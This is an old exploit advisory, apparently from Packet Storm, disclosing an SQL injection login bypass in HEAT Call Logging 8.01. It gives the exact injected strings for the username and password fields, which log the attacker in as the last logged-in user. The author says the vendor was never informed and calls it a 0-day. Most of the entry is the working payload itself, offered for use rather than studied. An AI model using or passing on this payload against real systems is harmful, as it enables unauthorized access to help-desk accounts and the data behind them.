HEAT Call Logging 8.01 SQL Injection

2009-09-29T00:00:00
ID PACKETSTORM:81701
Type packetstorm
Reporter 0 0
Modified 2009-09-29T00:00:00

Description

                                        
                                            `[=[ ;otokoyama; ]=]  
  
  
-=[HEAT Call Logging Version 8.01]=-  
"The HEAT family is a comprehensive service solution,  
combining core technologies with a variety of expansion options,  
so any enterprise can build a tailored solution."  
  
-=[web]=-  
http://www.frontrange.com/heat.aspx  
  
-=[attack]=-  
U:' OR HEATPass IS NOT NULL OR HEATPass = '  
P:' OR HEATPass IS NOT NULL OR HEATPass = '  
  
-=[Effect]=-  
Logs in as last logged in user.  
There would be many variations of the above, but who can be bothered.  
  
-=[NOTICE]=-  
Due to vendor and product distaste I have not informed them of this vuln.  
  
I guess this is a 0-day then..  
  
Via their webpage current version appears to be 9.0,  
could apply to this version aswell  
  
SHOUTS:4chan for being shit, yes I will troll in a POC.  
  
  
antilimit owns you  
`